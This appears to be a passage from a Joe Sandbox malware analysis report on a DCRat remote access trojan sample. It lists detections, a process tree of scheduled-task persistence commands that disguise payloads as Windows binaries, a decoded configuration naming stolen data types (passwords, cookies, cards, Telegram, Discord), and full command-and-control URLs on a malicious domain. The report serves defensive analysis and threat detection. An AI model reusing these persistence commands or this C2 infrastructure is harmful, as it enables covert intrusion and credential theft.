Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dmhu7oz5yP.exe

Overview

General Information

Sample name:dmhu7oz5yP.exe
renamed because original name is a hash value
Original sample name:ED9312F79BD3E7F4BEB41E56EA82512E.exe
Analysis ID:1502160
MD5:ed9312f79bd3e7f4beb41e56ea82512e
SHA1:213d531f2ca1543ecc1af3ad2b7fe56b4b027bfe
SHA256:786b9891bc5ca12d44f2df1a978f675693647eaed50da66b92bdbd3c290bca88
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dmhu7oz5yP.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\dmhu7oz5yP.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
    • schtasks.exe (PID: 7352 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7368 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7384 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7400 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7416 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7432 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7448 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7464 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7496 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7512 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7528 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7544 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7560 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7576 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7612 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7640 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7672 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7712 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7736 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7760 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7808 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7848 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7872 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7896 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7912 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7940 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 8104 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • fontdrvhost.exe (PID: 7584 cmdline: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • fontdrvhost.exe (PID: 7604 cmdline: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • jnTUlYyDyuybgXdgxhTkT.exe (PID: 7632 cmdline: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • jnTUlYyDyuybgXdgxhTkT.exe (PID: 7664 cmdline: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • RuntimeBroker.exe (PID: 7688 cmdline: C:\Users\Public\Libraries\RuntimeBroker.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • RuntimeBroker.exe (PID: 7720 cmdline: C:\Users\Public\Libraries\RuntimeBroker.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • upfc.exe (PID: 3524 cmdline: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • upfc.exe (PID: 5600 cmdline: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"L\":\"^\",\"S\":\"!\",\"U\":\"*\",\"3\":\" \",\"=\":\"#\",\"p\":\"%\",\"Z\":\")\",\"h\":\"@\",\"I\":\">\",\"Y\":\";\",\"9\":\",\",\"d\":\"$\",\"P\":\"-\",\"0\":\"(\",\"l\":\"~\",\"J\":\"|\",\"2\":\".\",\"V\":\"_\",\"w\":\"`\",\"y\":\"<\",\"Q\":\"&\"}", "PCRT": "{\"S\":\"#\",\"I\":\"_\",\"6\":\"|\",\"w\":\"~\",\"Q\":\"<\",\"j\":\")\",\"M\":\"@\",\"f\":\"^\",\"y\":\"&\",\"X\":\"`\",\"=\":\"$\",\"b\":\"(\",\"e\":\"!\",\"0\":\"*\",\"c\":\",\",\"x\":\" \",\"p\":\">\",\"D\":\"%\",\"i\":\";\",\"l\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-6XDJ2LvIT83i7tWOhrAy", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://mioww.uebki.one/@==gbJBzYuFDT", "H2": "http://mioww.uebki.one/@==gbJBzYuFDT", "T": "0"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
dmhu7oz5yP.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    dmhu7oz5yP.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      dmhu7oz5yP.exeMALWARE_Win_DCRatDCRat payloadditekSHen
      • 0x41f28:$x2: DCRat-Log#
      • 0x40a36:$x3: DCRat.Code
      • 0x4025a:$v1: Plugin couldn't process this action!
      • 0x402a4:$v2: Unknown command!
      • 0x41f86:$v4: Saving log...
      • 0x41fa2:$v5: ~Work.log
      • 0x4127d:$v8: %SystemDrive% - Slow
      • 0x412a7:$v9: %UsersFolder% - Fast
      • 0x412d1:$v10: %AppData% - Very Fast

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeMALWARE_Win_DCRatDCRat payloadditekSHen
          • 0x41f28:$x2: DCRat-Log#
          • 0x40a36:$x3: DCRat.Code
          • 0x4025a:$v1: Plugin couldn't process this action!
          • 0x402a4:$v2: Unknown command!
          • 0x41f86:$v4: Saving log...
          • 0x41fa2:$v5: ~Work.log
          • 0x4127d:$v8: %SystemDrive% - Slow
          • 0x412a7:$v9: %UsersFolder% - Fast
          • 0x412d1:$v10: %AppData% - Very Fast
          C:\Users\Default\RuntimeBroker.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Users\Default\RuntimeBroker.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 22 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
                00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
                  00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
                    00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
                      00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
                        Click to see the 44 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.dmhu7oz5yP.exe.2b0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          0.0.dmhu7oz5yP.exe.2b0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            0.0.dmhu7oz5yP.exe.2b0000.0.unpackMALWARE_Win_DCRatDCRat payloadditekSHen
                            • 0x41f28:$x2: DCRat-Log#
                            • 0x40a36:$x3: DCRat.Code
                            • 0x4025a:$v1: Plugin couldn't process this action!
                            • 0x402a4:$v2: Unknown command!
                            • 0x41f86:$v4: Saving log...
                            • 0x41fa2:$v5: ~Work.log
                            • 0x4127d:$v8: %SystemDrive% - Slow
                            • 0x412a7:$v9: %UsersFolder% - Fast
                            • 0x412d1:$v10: %AppData% - Very Fast

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Execution from Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Libraries\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Libraries\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, ProcessId: 7688, ProcessName: RuntimeBroker.exe
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\dmhu7oz5yP.exe, ProcessId: 7296, TargetFilename: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Libraries\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Libraries\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, ProcessId: 7688, ProcessName: RuntimeBroker.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\dmhu7oz5yP.exe", ParentImage: C:\Users\user\Desktop\dmhu7oz5yP.exe, ParentProcessId: 7296, ParentProcessName: dmhu7oz5yP.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f, ProcessId: 7544, ProcessName: schtasks.exe

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Schedule system process
                            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\dmhu7oz5yP.exe", ParentImage: C:\Users\user\Desktop\dmhu7oz5yP.exe, ParentProcessId: 7296, ParentProcessName: dmhu7oz5yP.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f, ProcessId: 7496, ProcessName: schtasks.exe

                            Suricata Signatures

                            Timestamp:2024-08-31T10:15:43.077373+0200
                            SID:2850862
                            Severity:1
                            Source Port:80
                            Destination Port:49778
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-08-31T10:14:16.499938+0200
                            SID:2850862
                            Severity:1
                            Source Port:80
                            Destination Port:49763
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-08-31T10:11:57.441180+0200
                            SID:2034194
                            Severity:1
                            Source Port:49730
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: dmhu7oz5yP.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktBAvira URL Cloud: Label: malware
                            Source: http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZAvira URL Cloud: Label: malware
                            Source: http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3WAvira URL Cloud: Label: malware
                            Source: http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTYAvira URL Cloud: Label: malware
                            Source: http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGTAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Users\Default\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Users\Default\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Windows\Media\WinStore.App.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Source: C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeAvira: detection malicious, Label: HEUR/AGEN.1310064
                            Found malware configuration
